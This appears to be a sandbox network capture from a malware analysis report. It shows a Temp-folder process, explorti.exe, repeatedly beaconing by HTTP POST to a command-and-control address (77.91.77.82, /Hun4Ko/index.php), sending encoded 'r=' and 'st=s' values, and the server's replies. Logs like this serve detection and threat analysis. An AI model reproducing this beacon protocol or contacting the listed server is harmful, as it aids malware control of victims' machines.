                                            Jul 2, 2024 08:27:48.061872005 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            65192.168.2.46395777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:48.071360111 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:48.762784958 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            66192.168.2.46395877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:48.883661985 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            67192.168.2.46395977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:48.900490046 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:49.612490892 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            68192.168.2.46396077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:49.727516890 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            69192.168.2.46396177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:49.743341923 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:50.438713074 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            70192.168.2.46396277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:50.555696964 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            71192.168.2.46396377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:50.570885897 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:51.258675098 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            72192.168.2.46396477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:51.371644020 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            73192.168.2.46396577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:51.383019924 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:52.071144104 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            74192.168.2.46396677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:52.198167086 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:52.904476881 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            75192.168.2.46396777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:52.916631937 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:53.632946968 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            76192.168.2.46396877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:53.743527889 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:54.452168941 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            77192.168.2.46396977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:54.461580038 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:55.171885014 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            78192.168.2.46397077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:55.290575027 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:55.975987911 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            79192.168.2.46397177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:55.985210896 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:56.676019907 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            80192.168.2.46397277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:56.791466951 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:57.765178919 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:57.767267942 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            81192.168.2.46397377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:57.775561094 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            82192.168.2.46397477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:57.906393051 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:58.619215012 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            83192.168.2.46397577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:58.632041931 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:59.324934959 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            84192.168.2.46397677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:59.447166920 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:00.160264015 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            85192.168.2.46397777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:00.169070959 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:00.859476089 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            86192.168.2.46397877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:00.978267908 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:01.683527946 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            87192.168.2.46397977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:01.717927933 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
